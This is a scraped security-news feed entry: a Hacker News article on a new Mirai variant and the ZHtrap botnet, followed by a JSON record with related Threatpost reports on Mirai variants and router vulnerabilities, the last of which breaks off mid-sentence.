New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild
2021-03-16T10:32:00
ID THN:3907AE12F794F0523BEE196D6543A50F Type thn Reporter The Hacker News Modified 2021-03-18T03:14:02
Description
Cybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet connected devices.
"Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers," Palo Alto Networks' Unit 42 Threat Intelligence Team said in a write-up.
The rash of vulnerabilities being exploited include:
VisualDoor - a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January
CVE-2021-27561 and CVE-2021-27562 - Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges
CVE-2021-22502 - an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40
CVE-2019-19356 - a Netis WF2419 wireless router RCE exploit, and
CVE-2020-26919 - a Netgear ProSAFE Plus RCE vulnerability
"The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases," SonicWall said in a statement to The Hacker News. "It is not viable against any properly patched SonicWall appliances."
Also included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with a separate botnet by the name of MooBot.
The attacks are said to have been detected over a month-long period starting from February 16 to as recent as March 13.
Regardless of the flaws used to achieve successful exploitation, the attack chain involves the use of wget utility to download a shell script from the malware infrastructure that's then used to fetch Mirai binaries, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks.
Besides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.
"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences," the researcher said.
New ZHtrap Botnet Traps Victims Using a Honeypot
In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as Matryosh.
While honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.
It achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload -
"ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features," the researchers said. "Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device."
Once it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.
Noting that the attacks began from February 28, 2021, the researchers said ZHtrap's ability to turn infected devices into honeypots marks an "interesting" evolution of botnets to facilitate finding more targets.
These Mirai-based botnets are the latest to spring up on the threat landscape, in part fanned by the availability of Mirai's source code on the Internet since 2016, opening the field wide open for other attackers to build their own variants.
Last March, researchers discovered a Mirai variant called "Mukashi," which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named "Katana," which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 Switches.
Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.
{"id": "THN:3907AE12F794F0523BEE196D6543A50F", "type": "thn", "bulletinFamily": "info", "title": "New Mirai Variant and ZHtrap Botnet Malware Emerge in the Wild", "description": "[](<https://thehackernews.com/images/-RHtuGy5HftM/YFCJDLIpWjI/AAAAAAAACCw/pM55oGojHcUHm6M2-ZX9QAX6Z-Nm1z4UACLcBGAsYHQ/s0/botnet.jpg>)\n\nCybersecurity researchers on Monday disclosed a new wave of ongoing attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet connected devices.\n\n\"Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,\" Palo Alto Networks' Unit 42 Threat Intelligence Team [said](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in a write-up.\n\nThe rash of vulnerabilities being exploited include:\n\n * [VisualDoor](<https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/>) \\- a SonicWall SSL-VPN remote command injection vulnerability that came to light earlier this January\n * [CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>) \\- a D-Link DNS-320 firewall remote code execution (RCE) vulnerability\n * [CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>) \\- Two vulnerabilities in Yealink Device Management that allow an unauthenticated attacker to run arbitrary commands on the server with root privileges\n * [CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>) \\- an RCE flaw in Micro Focus Operation Bridge Reporter (OBR), affecting version 10.40\n * [CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) \\- a Netis WF2419 wireless router RCE exploit, and\n * [CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>) \\- a Netgear ProSAFE Plus RCE vulnerability\n\n\"The VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\" SonicWall said in a statement to The Hacker News. \"It is not viable against any properly patched SonicWall appliances.\"\n\nAlso included in the mix are three previously undisclosed command injection vulnerabilities that were deployed against unknown targets, one of which, according to the researchers, has been observed in conjunction with a separate botnet by the name of [MooBot](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot>).\n\nThe attacks are said to have been detected over a month-long period starting from February 16 to as recent as March 13.\n\nRegardless of the flaws used to achieve successful exploitation, the attack chain involves the use of wget utility to download a shell script from the malware infrastructure that's then used to fetch [Mirai](<https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai>) binaries, a notorious malware that turns networked IoT devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks.\n\nBesides downloading Mirai, additional shell scripts have been spotted retrieving executables to facilitate brute-force attacks to break into vulnerable devices with weak passwords.\n\n\"The IoT realm remains an easily accessible target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences,\" the researcher said.\n\n### New ZHtrap Botnet Traps Victims Using a Honeypot\n\nIn a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that makes use of a honeypot to harvest additional victims, while borrowing some features from a DDoS botnet known as [Matryosh](<https://thehackernews.com/2021/02/beware-new-matryosh-ddos-botnet.html>).\n\n[](<https://thehackernews.com/images/-uqNg1z1INRs/YFCGXS3KMzI/AAAAAAAACCo/_lMwW_bvOD8a4SK4Ri190P4PBgrM4o2AQCLcBGAsYHQ/s0/botnet-malwar.jpg>)\n\nWhile honeypots typically mimic a target for cyber criminals so as to take advantage of their intrusion attempts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for gathering IP addresses that are used as targets for further worm-like propagation.\n\nIt achieves this by listening on 23 designated ports and identifying IP addresses that connect to these ports, then using the amassed IP addresses to inspect them for four vulnerabilities to inject the payload -\n\n * MVPower DVR Shell [unauthenticated RCE](<https://www.exploit-db.com/exploits/41471>)\n * Netgear DGN1000 Setup.cgi [unauthenticated RCE](<https://www.exploit-db.com/exploits/43055>)\n * [CCTV DVR RCE](<https://www.exploit-db.com/exploits/39596>) affecting multiple vendors, and\n * Realtek SDK miniigd SOAP [command execution](<https://www.exploit-db.com/exploits/37169>) (CVE-2014-8361)\n\n\"ZHtrap's propagation uses four N-day vulnerabilities, the main function is DDoS and scanning, while integrating some backdoor features,\" the researchers [said](<https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/>). \"Zhtrap sets up a honeypot on the infected device, [and] takes snapshots for the victim devices, and disables the running of new commands based on the snapshot, thus achieving exclusivity over the device.\"\n\n[](<https://thehackernews.com/images/-Uzpn4VdFyoE/YFCEwPNpN2I/AAAAAAAACCk/OLQNFZXfk90IMbMQYZNw8YzlN-g5YeszgCLcBGAsYHQ/s0/botnet-malware.jpg>)\n\nOnce it has taken over the devices, ZHtrap takes a cue from the Matryosh botnet by using Tor for communications with a command-and-control server to download and execute additional payloads.\n\nNoting that the attacks began from February 28, 2021, the researchers said ZHtrap's ability to turn infected devices into honeypots marks an \"interesting\" evolution of botnets to facilitate finding more targets.\n\nThese Mirai-based botnets are the latest to spring up on the threat landscape, in part fanned by the availability of Mirai's source code on the Internet since 2016, opening the field wide open for other attackers to build their own variants.\n\nLast March, researchers discovered a Mirai variant called \"[Mukashi](<https://thehackernews.com/2020/03/zyxel-mukashi-mirai-iot-botnet.html>),\" which was found targeting Zyxel network-attached storage (NAS) devices to conscript them into a botnet. Then in October 2020, Avira's IoT research team identified another variant of the Mirai botnet named \"[Katana](<https://www.avira.com/en/blog/katana-a-new-variant-of-the-mirai-botnet>),\" which exploited remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 Switches.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-03-16T10:32:00", "modified": "2021-03-18T03:14:02", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://thehackernews.com/2021/03/new-mirai-variant-and-zhtrap-botnet.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2014-8361", "CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "lastseen": "2021-03-18T04:27:44", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "THREATPOST:1E765B1FCA5C193278D6E5A1951FF4BF", "THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "THREATPOST:9CC8C9C750EB5EFD6E67DD7C0C8549FB", "THREATPOST:D01E39B118AD961C99A79B4280C13B6A", "THREATPOST:E7D70D8CBF2F64521691B2DF2726498C", "THREATPOST:58600E628B858CCDB55A42CF867B1CF7", "THREATPOST:B768158F88D25034EC975AA313B9339C"]}, {"type": "cve", "idList": ["CVE-2020-25506", "CVE-2020-26919", "CVE-2019-19356", "CVE-2014-8361", "CVE-2021-22502"]}, {"type": "f5", "idList": ["F5:K57390658"]}, {"type": "zdi", "idList": ["ZDI-21-154", "ZDI-15-155", "ZDI-21-153"]}, {"type": "zdt", "idList": ["1337DAY-ID-23686"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132090", "PACKETSTORM:156588"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/DLINK_UPNP_EXEC_NOAUTH", "MSF:EXPLOIT/LINUX/HTTP/REALTEK_MINIIGD_UPNP_EXEC_NOAUTH"]}, {"type": "nessus", "idList": ["REALTEK_CVE_2014_8361.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:37169"]}, {"type": "jvn", "idList": ["JVN:47580234", "JVN:74871939", "JVN:67456944"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EC837ED1EA41395DFCD50B526170B177"]}, {"type": "securelist", "idList": ["SECURELIST:2F75371B5752C888430A598DF749FD1A", "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201993392"]}], "modified": "2021-03-18T04:27:44", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-03-18T04:27:44", "rev": 2}, "vulnersScore": 7.0}, "immutableFields": []}
{"threatpost": [{"lastseen": "2021-03-17T20:47:24", "bulletinFamily": "info", "cvelist": ["CVE-2019-19356", "CVE-2020-25506", "CVE-2020-26919", "CVE-2021-22502", "CVE-2021-27561", "CVE-2021-27562"], "description": "A new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices \u2014 as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.\n\nSince Feb. 16, the new variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet. It\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), years after source code for the malware [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\n\u201cThe attacks are still ongoing at the time of this writing,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team [on Monday](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>). \u201cUpon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers.\u201d\n\n## **Initial Exploit: New and Old Flaws**\n\nThe attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: A SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit ([CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>)); Yealink Device Management remote code-execution (RCE) flaws ([CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>)); a Netgear ProSAFE Plus RCE flaw ([CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>)); an RCE flaw in Micro Focus Operation Bridge Reporter ([CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>)); and a Netis WF2419 wireless router exploit ([CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) ).\n\nPatches are available for all of these flaws; the botnet is targeting devices that have not yet applied the available updates.\n\nFor instance, \u201cthe VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\u201d a SonicWall spokesperson told Threatpost. \u201cIt is not viable against any properly patched SonicWall appliances.\u201d\n\nThe botnet also exploited vulnerabilities that were not previously identified. Researchers believe that these flaws exist in IoT devices.\n\n\u201cWe cannot say with certainty what the targeted devices are for the unidentified exploits,\u201d Zhibin Zhang, principal researcher for Unit 42, told Threatpost. \u201cHowever, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.\u201d\n\nThe exploits themselves include two RCE attacks \u2014 including an exploit targeting a command-injection vulnerability in certain components; and an exploit targeting the Common Gateway Interface (CGI) login script (stemming from a key parameter not being properly sanitized). The third exploit targets the op_type parameter, which is not properly sanitized leading to a command injection, said researchers.\n\nThe latter has \u201cbeen observed in the past being [used by [the] Moobot [botnet]](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>), however the exact target is unknown,\u201d researchers noted. Threatpost has reached out to researchers for further information on these unknown targets.\n\n## **Mirai Botnet: A Set of Binaries**\n\nAfter initial exploitation, the malware invokes the wget utility (a legitimate program that retrieves content from web servers) in order to download a shell script from the malware\u2019s infrastructure. The shell script then downloads several Mirai binaries and executes them, one-by-one.\n\nOne such binary includes lolol.sh, which has multiple functions. Lolol.sh deletes key folders from the target machine (including ones with existing scheduled jobs and startup scripts); creates packet filter rules to bar incoming traffic directed at the commonly-used SSH, HTTP and telnet ports (to make remote access to the affected system more challenging for admins); and schedules a job that aims to rerun the lolol.sh script every hour (for persistence). Of note, this latter process is flawed, said researchers, as the cron configuration is incorrect.\n\nAnother binary (install.sh) downloads various files and packages \u2013 including GoLang v1.9.4, the \u201cnbrute\u201d binaries (that [brute-force various credentials](<https://threatpost.com/millions-brute-force-attacks-rdp/155324/>)) and the combo.txt file (which contains numerous credential combinations, to be used for brute-forcing by \u201cnbrute\u201d).\n\nThe final binary is called dark.[arch], and is based on the Mirai codebase. This binary mainly functions for propagation, either via the various initial Mirai exploits described above, or via brute-forcing SSH connections using hardcoded credentials in the binary.\n\n## **Mirai Variants Continue to Pop Up**\n\nThe variant is only the latest to rely on Mirai\u2019s source code, [which has proliferated into more than 60 variants](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) since bursting on the scene with a massive distributed denial of service (DDoS) [takedown of DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) in 2016.\n\nLast year, a Mirai variant was found [targeting Zyxel network-attached storage (NAS) devices](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) using a critical vulnerability that was only recently discovered, according to security researchers. In 2019, [a variant of the botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>) was found sniffing out and targeting vulnerabilities in enterprise wireless presentation and display systems. And, a 2018 variant [was used to launch a series of DDoS campaigns](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) against financial-sector businesses.\n\nResearchers said that the biggest takeaway here is that connected devices continue to pose a security problem for users. They strongly advised customers to apply patches whenever possible.\n\n\u201cThe IoT realm remains an easily accessible target for attackers,\u201d according to Unit 42\u2019s report. \u201cMany vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "modified": "2021-03-16T16:57:46", "published": "2021-03-16T16:57:46", "id": "THREATPOST:3F4C590CA1F6027665DF96DF6D651032", "href": "https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/", "type": "threatpost", "title": "Latest Mirai Variant Targets SonicWall, D-Link and IoT Devices", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:57", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361"], "description": "A zero day vulnerability in popular household routers from D-Link and Trendnet could be exploited by attackers to run arbitrary code on devices.\n\nThe flaw, which can be exploited without authentication, is present in version 1.3 of Realtek\u2019s SDK, which figures into some brands of routers, according to by HP\u2019s Zero Day Initiative who disclosed the vulnerability last Friday.\n\n\u201cThe specific flaw exists within the miniigd SOAP service,\u201d reads the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-155/>), \u201cThe issue lies in the handling of the NewInternalClient requests due to a failure to sanitize user data before executing a service call. An attacker could leverage this vulnerability to execute code with root privileges.\u201d\n\nRicky \u201cHeadless Zeke\u201d Lawshae, a security researcher for DV Labs at HP\u2019s Tipping Point reported the vulnerability (CVE-2014-8361) to HP\u2019s ZDI in August 2014. Lawshae initially identified the vulnerabilities in routers from Trendnet and D-link, but acknowledged on Twitter [over the weekend](<https://twitter.com/HeadlessZeke/status/592125815183147008>) that anything using the miniigd binary from Realtek\u2019s SDK could be vulnerable.\n\n> Remember that 0day I mentioned a loooong time ago? The advisory just went up.\n> \n> \u2014 HeadlessZeke (@HeadlessZeke) [April 24, 2015](<https://twitter.com/HeadlessZeke/status/591714797395185664>)\n\n> Unauth remote root via the WAN port on a huge number of SOHO routers using the RealTek chipset SDK <http://t.co/tVWqJuvNl3>\n> \n> \u2014 HeadlessZeke (@HeadlessZeke) [April 24, 2015](<https://twitter.com/HeadlessZeke/status/591715502860304384>)\n\nZDI reached out to the vendor four times from August to October last year without hearing back and decided to go public with the vulnerability last week.\n\nTo mitigate the vulnerability, ZDI is instructing users to restrict Realtek SDK\u2019s interaction to trusted machines. Using either firewalls or whitelisting, users should only grant \u201cclients and servers that have a legitimate procedural relationship\u201d with the SDK the ability to access it.\n\nRouter companies have had an extraordinarily tough go of it on the security front this year. D-Link in particular has been forced to [patch a handful of vulnerabilities](<https://threatpost.com/d-link-working-on-firmware-updates-for-three-critical-bugs/111420>) in its home routers that gave attackers [root access and enabled DNS hijacking](<https://threatpost.com/d-link-routers-haunted-by-remote-command-injection-bug/111355>) throughout February and March.\n", "modified": "2015-05-06T17:15:08", "published": "2015-04-30T14:07:04", "id": "THREATPOST:B768158F88D25034EC975AA313B9339C", "href": "https://threatpost.com/unpatched-router-vulnerability-could-lead-to-code-execution/112524/", "type": "threatpost", "title": "Routers Vulnerable to Critical Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:58", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "description": "Exploit code used in the Mirai malware variant called Satori, which was used to attack hundreds of thousands of Huawei routers over the[ past several weeks](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), is now public. Researchers warn the code will quickly become a commodity and be leveraged in DDoS attacks via botnets such as Reaper or IOTrooper.\n\nAnkit Anubhav, researcher at NewSky Security first identified the code on Monday that was posted publicly on Pastebin.com. The code is the zero-day vulnerability CVE- 2017-17215 used by a hacker identified as \u201cNexus Zeta\u201d to spread a variant of the Mirai malware called Satori, also known as Mirai Okiru.\n\n\u201cThe fact that the code is now in the open means that more threat actors would now be using it. We can assume that the exploit would become commodity, and IoT botnets that attempt at exploiting a large kit of vulnerabilities will be adding CVE- 2017-17215 to their arsenal,\u201d said Maya Horowitz, threat intelligence group manager, Check Point.\n\n[Last week](<https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/>), Check Point identified the vulnerability ([CVE-2017-17215](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17215>)) in a Huawei home router model HG532 that was being exploited by Nexus Zeta to spread the Mirai variant Mirai Okiru/Satori. Since then Huawei issued an updated [security notice](<http://www.huawei.com/en/psirt/security-notices/huawei-sn-20171130-01-hg532-en>) to customers warning the flaw allows a remote adversary to send malicious packets to port 37215 to execute remote code on vulnerable routers.\n\n\u201cThis code is now known to a variety of black hats. Just like previous SOAP exploits released for free to the public it will be used by various script kiddies and threat actors,\u201d Anubhav said. NewSky Security posted [a blog Thursday outlining its discovery](<https://blog.newskysecurity.com/huawei-router-exploit-involved-in-satori-and-brickerbot-given-away-for-free-on-christmas-by-ac52fe5e4516>) of the zero-day code.\n\nThe underlying cause was a bug related to SOAP, a protocol used by many IoT devices, Anubhav said. Earlier issues in SOAP (CVE-2014-8361 and TR-064 ) effected different vendors and was widely used by Mirai variants.\n\nIn the case of CVE-2017-17215, this zero day exploits how the Huawei router uses of the Universal Plug and Play (UPnP) protocol and the TR-064 technical report standard. TR-064 is a standard designed to make it easy to add embedded UPnP devices to a local network.\n\n\u201cIn this case though, the TR-064 implementation in the Huawei devices was exposed to WAN through port 37215 (UPnP),\u201d researchers wrote. The UPnP framework supports a \u201cDeviceUpgrade\u201d that can carry out a firmware upgrade action.\n\nThe vulnerability allows remote administrators to execute arbitrary commands by injecting shell meta-characters into the DeviceUpgrade process.\n\n\u201cAfter these have been executed, the exploit returns the default HUAWEIUPNP message, and the \u2018upgrade\u2019 is initiated,\u201d Check Point researchers wrote.\n\nThe payload\u2019s main purpose is to instruct the bot to flood targets with manually crafted UDP or TCP packets.\n\n\u201cThe exploit code was already used by two major IoT botnets, Brickerbot and Satori, and now that the code is public it will be incorporated into different botnet strains,\u201d Anubhav said.\n\nMitigation against attacks includes configuring a router\u2019s built-in firewall, changing the default password or using firewall at the carrier side, Huawei said.\n\n\u201cPlease note that users of this router are mostly home users, who do not typically log in to their router\u2019s interface and don\u2019t necessarily have the know-how, and so unfortunately I have to assume most devices would stay vulnerable,\u201d Horowitz said. \u201cWe desperately need IoT device manufacturers to make security a top priority and not to leave the users accountable.\u201d\n", "modified": "2017-12-28T14:01:00", "published": "2017-12-28T14:01:00", "id": "THREATPOST:58600E628B858CCDB55A42CF867B1CF7", "href": "https://threatpost.com/code-used-in-zero-day-huawei-router-attack-made-public/129260/", "type": "threatpost", "title": "Code Used in Zero Day Huawei Router Attack Made Public", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-08T12:00:30", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "description": "New samples of the Mirai malware have been identified, targeting an array of embedded processors and architectures within connected devices.\n\nResearchers said that they discovered new Mirai samples in February 2019, capable of infecting IoT devices running Altera Nios II, OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. Variants of Mirai have previously targeted CPU architectures like ARM and x86.\n\nWhile it\u2019s not the first time Mirai\u2019s targeting of new processor architectures has expanded \u2013 samples targeting Argonaut RISC Core (ARC) CPUs were discovered in [January 2018](<https://twitter.com/_odisseus/status/952643252116770817?ref_src=twsrc%5Etfw>) \u2013the development shows that Mirai developers continue to expand their targets to incorporate a growing array of IoT devices, researchers with Palo Alto Network\u2019s Unit 42 group said in a [Monday post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe addition of these processors expands the pool of potential devices which can be compromised and used for malicious activity,\u201d Jen Miller-Osborn, deputy director of threat intelligence for Unit 42 at Palo Alto Networks, told Threatpost. \u201cWe can\u2019t confirm all devices which contain these processors or why the actors chose to compile for them.\u201d\n\nXilinx\u2019s MicroBlaze processor and Altera\u2019s Nios II processors are specifically designed for field programmable gate array (FPGA) integrated circuits. FPGAs, which allow users to program hardware circuits to optimize a chip for a particular workload, are used for IoT application application requirements due to their low power.\n\nThe Mirai samples also are capable of infecting Tensilica\u2019s Xtensa processors, which range from small low-power microcontrollers up to neural network processors; and OpenRISC project based-open source CPUs, several of which are also known to run on FPGAs.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/08160552/Mirai-Sample.png>)\n\nMirai Samples\n\n\u201cExpanding Mirai-like malware to new architectures will only cause further headaches for those responsible for mitigating botnet activity,\u201d Troy Mursch, owner of Bad Packets Report, told Threatpost. \u201cGiven that the source code for Mirai has been open source for years now, this was inevitable. As for the impact of this \u2018expansion\u2019 we\u2019ll have to wait and see. DDoS attacks from Mirai-like botnets continue to plague the internet with some recently reaching nearly 40 Gbps in size.\u201d\n\nThe latest samples were discovered being hosted in an open directory on a single IP. The samples contained exploits that were known to be used in previous versions of Mirai.\n\nThat includes an exploit for a ThinkPHP remote code execution flaw, a D-Link DSL2750B OS command infection and a Netgear remote code execution glitch. Also included were exploits for CVE-2014-8361 (an arbitrary code execution flaw in Realtek SDK) and CVE-2017-17215 (a remote code execution flaw in Huawei HG532 routers).\n\n\u201cThe presence of these exploits in both previous versions of Mirai and our newly discovered samples help show the tie between the two are likely used by the same attacker in this case,\u201d researchers said.\n\nMursch said he has also seen the same exploit attempts targeting the vulnerabilities listed.\n\n\u201cThis is because the targeted devices do not get patched and become re-infected by Mirai-like malware over and over,\u201d he said. \u201cCVE-2017-17215 is notable as it was used by the [Satori botnet](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>) and infected hundreds of thousands of Huawei devices. The author of that botnet is now under indictment by the FBI.\u201d\n\nOn Feb. 22, the server was updated to hide the file listing, researchers said. A full list of Indicators of Compromise (IoCs) are available on their [blog post](<https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/>).\n\nMirai is best known for being used in a massive, unprecedented DDoS attack that compromised more than 300,000 IoT devices to take down major websites [in 2016](<https://threatpost.com/a-mirai-botnet-postscript-lessons-learned/130529/>).\n\nVariants of Mirai continue to pop up as cybercriminals tap into a growing rate of vulnerable Internet of Things devices. In September, researchers [discovered](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>) new variants for the infamous Mirai and Gafgyt IoT botnets targeting well-known vulnerabilities in Apache Struts and SonicWall; and in March researchers said that [a new Mirai variant](<https://threatpost.com/mirai-enterprise-systems/142889/>) was targeting TV and presentation systems used by enterprises.\n\n_**Don\u2019t miss our free**_**_ _**[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)_**, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET.**_\n\n_**A panel of experts will join Threatpost senior editor Tara Seals to discuss**_**_ _**_**how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS.**_\n", "modified": "2019-04-08T20:40:56", "published": "2019-04-08T20:40:56", "id": "THREATPOST:1E765B1FCA5C193278D6E5A1951FF4BF", "href": "https://threatpost.com/new-mirai-samples-grow-the-number-of-processors-targets/143566/", "type": "threatpost", "title": "New Mirai Samples Grow the Number of Processor Targets", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:27:47", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361", "CVE-2017-17215"], "description": "Researchers at Radware have discovered a new botnet that uses vulnerabilities linked with the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect IoT devices.\n\nSatori is a derivative of Mirai, the notorious botnet that in 2016 